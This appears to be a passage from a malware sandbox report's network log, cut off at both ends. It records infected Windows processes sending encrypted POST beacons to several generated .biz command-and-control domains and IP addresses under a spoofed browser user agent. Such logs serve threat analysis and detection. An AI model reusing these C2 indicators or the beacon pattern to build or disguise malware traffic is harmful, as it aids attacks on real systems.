                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:27:59.832426071 CEST | 1135 | OUT | POST /dqlfliuucamv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:00.098336935 CEST | 411 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:27:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ac58003ed01395622126f3a8e3c6836e|8.46.123.33|1728394079|1728394079|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.098647118 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:27:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ac58003ed01395622126f3a8e3c6836e|8.46.123.33|1728394079|1728394079|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.099280119 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:27:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ac58003ed01395622126f3a8e3c6836e|8.46.123.33|1728394079|1728394079|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49735 | 54.244.188.177 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:00.155926943 CEST | 348 | OUT | POST /tacyehq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786

Oct 8, 2024 15:28:00.155951977 CEST | 786 | OUT | Data Raw: 1b 71 f3 0e 44 bf eb c3 06 03 00 00 bd 8b b9 91 45 63 df 2d af a6 79 82 40 91 d4 5e 95 36 e9 90 b7 12 51 0f 2b ce 5f 1d 43 9d 3c 93 df 16 cc 27 13 d9 e6 00 e2 80 14 2e c3 bb fa cb b6 07 ad 7c 2f 63 36 e3 f5 a0 87 35 90 29 86 ea db 85 23 28 d8 c1
Data Ascii: qDEc-y@^6Q+_C<'.|/c65)#(?U:a:D8>JA]exn9FsEvNUYX$3TD8z(&a1C6d>Ew{;?lpIKMv|MR'-6[M5e]#[/t(1ZA

Oct 8, 2024 15:28:00.917686939 CEST | 407 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:28:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2f8e167369e3aaf8d14597ac8b1f2a07|8.46.123.33|1728394080|1728394080|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49736 | 18.141.10.107 | 80 | 2912 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:00.246228933 CEST | 346 | OUT | POST /aky HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Oct 8, 2024 15:28:00.246285915 CEST | 778 | OUT | Data Raw: 83 8a 36 1b 1d b6 fc 27 fe 02 00 00 03 cb b1 c0 41 6f 6e 1d 61 16 19 29 2a c8 15 dd 0f 8e e6 52 df 9e 67 0b 53 96 a3 1d d4 02 59 fb 79 19 b1 90 05 f3 71 ad 9b 0d 22 f3 7c 2c 8a 74 cc 23 01 c5 11 20 1d 71 8e ec 11 01 ad a2 f5 5e 6e ea 55 f7 b0 50
Data Ascii: 6'Aona)*RgSYyq"|,t# q^nUPk&#Gei5=I86%|z|}#E*F:dxn"Yc+*PU'P*+%2]O*q(m\uTl{8 -QzNY8A:gM8j(eFU

Oct 8, 2024 15:28:01.584125996 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:28:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8aeac2e577bbdc9dad3e267316d96762|8.46.123.33|1728394081|1728394081|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49737 | 44.221.84.105 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:00.959623098 CEST | 346 | OUT | POST /bh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:28:00.959644079 CEST | 786 | OUT | Data Raw: 42 44 5c ec 25 6c b2 c4 06 03 00 00 e5 32 66 7e 30 ed 9d 9f fc 28 73 60 23 83 e5 7f 1a d8 7e ad 01 9c a9 f4 ef 90 83 ff 66 fc 32 76 2e 04 f1 be dd a1 8d 87 86 d5 b4 1b d1 6e a2 c3 a5 29 de cb c2 f6 4d 2f 63 fd 1a dd ea e8 e0 d4 11 c2 11 c2 aa 03
Data Ascii: BD\%l2f~0(s`#~f2v.n)M/c#frC?nZR=*HVr6Sx6tB6T'Tc@BMcas%U0zH8q1_oKBvqYA6>u4LjO)_x:8vrqJY^
Oct 8, 2024 15:28:01.450040102 CEST | 410 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:28:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ba10ef5e1b2d810e359aa12d1ef8df07|8.46.123.33|1728394081|1728394081|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49739 | 172.234.222.143 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:01.515834093 CEST | 347 | OUT | POST /xitm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:28:01.515866995 CEST | 786 | OUT | Data Raw: 88 fe 6f 53 ed 78 41 5b 06 03 00 00 a1 b6 fc b7 55 23 63 37 3b c5 58 d8 a4 17 62 06 ce 0f 8f e4 d4 b9 80 9a c1 67 67 9e f6 d5 3f c0 b9 af e9 6a 99 7a f4 68 bb 8f 8c e0 e8 b9 be 7a 85 6c 08 40 c4 87 18 e5 9b 41 50 6f 20 8c 86 3f cd 08 05 90 8d 44
Data Ascii: oSxA[U#c7;Xbgg?jzhzl@APo ?D`&N4k*M;[R#W8~=&7kNWk=hV.`E;E)HzGR8Nx=]2$OEfD)9;kH4nUm ^&9\IGc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49740 | 54.244.188.177 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:01.695095062 CEST | 344 | OUT | POST /hbj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 8, 2024 15:28:01.695131063 CEST | 778 | OUT | Data Raw: 57 8b b5 15 d2 b4 b4 ef fe 02 00 00 96 bc 3c 41 ce 6c 00 1a be 6d e9 66 af 46 d5 da 8e 10 2a 9f 92 d4 d3 f5 22 8e c8 a8 a3 d7 13 f5 ac 01 9b 7e e2 37 e8 53 03 e5 40 4a 82 33 3e ee ae e7 e2 51 7b b0 72 36 70 e2 39 37 51 fd e8 1b 23 db 6c 57 b6 4b
Data Ascii: W<AlmfF*"~7S@J3>Q{r6p97Q#lWKFI~xC]-i0-*alyP+H7qA:8z?(4yZq&+]B}zYm,W].fU#g|Wb)R(9c8S


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49741 | 172.234.222.143 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:02.027410984 CEST | 349 | OUT | POST /gvnfcd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:28:02.027410984 CEST | 786 | OUT | Data Raw: 99 f1 ff c6 0c 18 4a e7 06 03 00 00 c7 a9 35 10 88 ca 8c e6 56 d6 3d 4e 79 0b 55 4f a0 c0 6e 96 4f c5 22 61 53 a1 3b 62 05 7d 48 5d f4 8a a6 a1 27 39 a6 4f 03 0a ba e8 ca 49 3f 60 6e 56 76 18 ba bb 9f ed 67 7b 07 54 fd b0 66 68 2a 6d ad 6b b5 a1
Data Ascii: J5V=NyUOnO"aS;b}H]'9OI?`nVvg{Tfh*mk{#l5?6:K5.-hZ'4s+?M(Y VmF*Gok@Zf5]5-rMiQ|{(I"Q[0kPRTg#3R?wFF#L|PHBXMpx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49742 | 54.244.188.177 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:02.611717939 CEST | 347 | OUT | POST /elpwpt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:02.611735106 CEST | 778 | OUT | Data Raw: 65 01 00 7b d7 cb 85 86 fe 02 00 00 28 7b 61 19 44 56 22 5d 4d 8a d4 2a 62 66 12 ef 1a 37 88 cf 54 45 13 6a ab f0 ca fb f4 84 dd 87 d9 a3 ca 5a 0f 44 f8 cb 62 89 20 7f ec d2 64 65 ca 49 ee ed 79 b8 9e ce 13 05 60 d6 4a 7d 23 58 dd ef b0 01 6a a2
Oct 8, 2024 15:28:03.364165068 CEST | 407 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=04ca5abcf7f9c47e7836816fe58e723c|8.46.123.33|1728394083|1728394083|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49743 | 18.141.10.107 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:02.628978014 CEST | 357 | OUT | POST /yywraaixbnedu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:02.629056931 CEST | 786 | OUT | Data Raw: 75 05 0a 0e 3b b9 1e 7f 06 03 00 00 2b 13 af 24 38 39 3c 55 88 e0 bd c1 f4 e9 43 5f f2 0d 5d 08 03 95 5d 0f d6 d2 dd 67 4b f0 2c 46 d5 7a cd 0a 73 a2 07 65 9c 91 3c 52 0c c4 46 22 17 7a c7 a9 87 da 7b 4f ef 99 04 97 25 b6 f5 c7 5b 28 bf 7e f0 e7
Oct 8, 2024 15:28:04.015014887 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=92fff9204b1514f820620f8d7c2c5f3d|8.46.123.33|1728394083|1728394083|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49745 | 44.221.84.105 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:04.099329948 CEST | 351 | OUT | POST /dgeuecv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:04.099348068 CEST | 778 | OUT | Data Raw: e7 ff 51 3f b9 ad 1c 9e fe 02 00 00 55 72 05 0e 07 99 e0 9c 84 8f c6 d0 84 39 cd dd 0b 8d b2 1d 51 a2 a8 59 1f e7 66 93 ba 6e b2 3c bb f7 c1 b8 48 b9 0c b8 76 2b 43 91 d6 46 c6 d3 d1 81 95 e2 0d b3 91 c2 bb 98 3a 18 f3 2f 95 0d d0 17 55 aa 5e c2
Oct 8, 2024 15:28:04.332451105 CEST | 1129 | OUT | POST /dgeuecv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:04.578183889 CEST | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:28:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=013a5df1149102c3daa059dccf5cef5f|8.46.123.33|1728394084|1728394084|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49746 | 82.112.184.197 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:04.364875078 CEST | 353 | OUT | POST /ddsolxmfcvq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:28:04.364906073 CEST | 786 | OUT | Data Raw: af 98 c6 f2 f7 37 bc cd 06 03 00 00 53 f3 15 7d c6 7a 4d 33 12 9e a7 40 4f 4a c4 83 d5 69 00 c2 14 d0 dd 14 e7 9f 0f 12 65 74 64 5f 7a b9 ba 94 da 0b 92 3b e2 89 a0 65 48 8c f5 f4 94 52 b9 85 61 4a 25 d6 93 d2 4d 22 a6 c2 68 d9 98 95 c4 56 fd 8c


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49748 | 172.234.222.143 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:04.837467909 CEST | 353 | OUT | POST /nljwtdwahh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:04.837492943 CEST | 778 | OUT | Data Raw: 8f 18 9c 26 fa 13 38 ec fe 02 00 00 a1 f1 e6 cf b4 46 26 99 79 0f c8 ad 90 80 04 d9 79 c7 d3 6c 44 20 13 8e 65 84 f9 6f b1 39 bd 3e 05 1b af f8 6c 4c 63 3c ad e1 81 62 44 26 d1 25 ee 01 91 99 3c 28 4a 2f 3c 6f 8d 36 ad b8 0f 05 f3 8b 80 fd bf 4e


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49749 | 172.234.222.143 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:05.429399967 CEST | 347 | OUT | POST /xjjg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:05.429419041 CEST | 778 | OUT | Data Raw: 23 c2 11 8e 03 51 14 bb fe 02 00 00 a4 43 c8 ef 9e 23 49 57 a0 53 aa a0 e7 62 b1 d3 4c b2 91 89 f7 8d d3 ff 6d 26 c0 fe 06 0d 7d ed ef 7c b7 bd ac 7f 93 0b 28 80 3e 40 17 f7 35 0b 35 d0 ee a9 aa 8b 78 c3 a3 49 ba 06 ce 1a 49 8c 01 85 a9 32 99 40


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49751 | 18.141.10.107 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:06.130330086 CEST | 358 | OUT | POST /ibdxbfqrqufvuu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:28:06.130623102 CEST | 778 | OUT | Data Raw: 66 4b 1f 8b 3d 37 4a 83 fe 02 00 00 6f 0c f5 c7 86 08 6f 80 27 c6 8b b9 1e d4 f5 32 0c cb b1 bc 35 70 2a 15 50 92 2c 2e 3d d1 77 51 76 03 4f b5 f7 58 b3 bf 82 68 81 a6 02 de 0b 04 45 8e 26 1b 6c a5 78 93 a9 d9 d5 74 0a e1 8e 9f ff 8f fc e8 4a 4f


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49754 | 18.141.10.107 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:28:06.892771959 CEST | 349 | OUT | POST /byear HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: knjghuig.biz
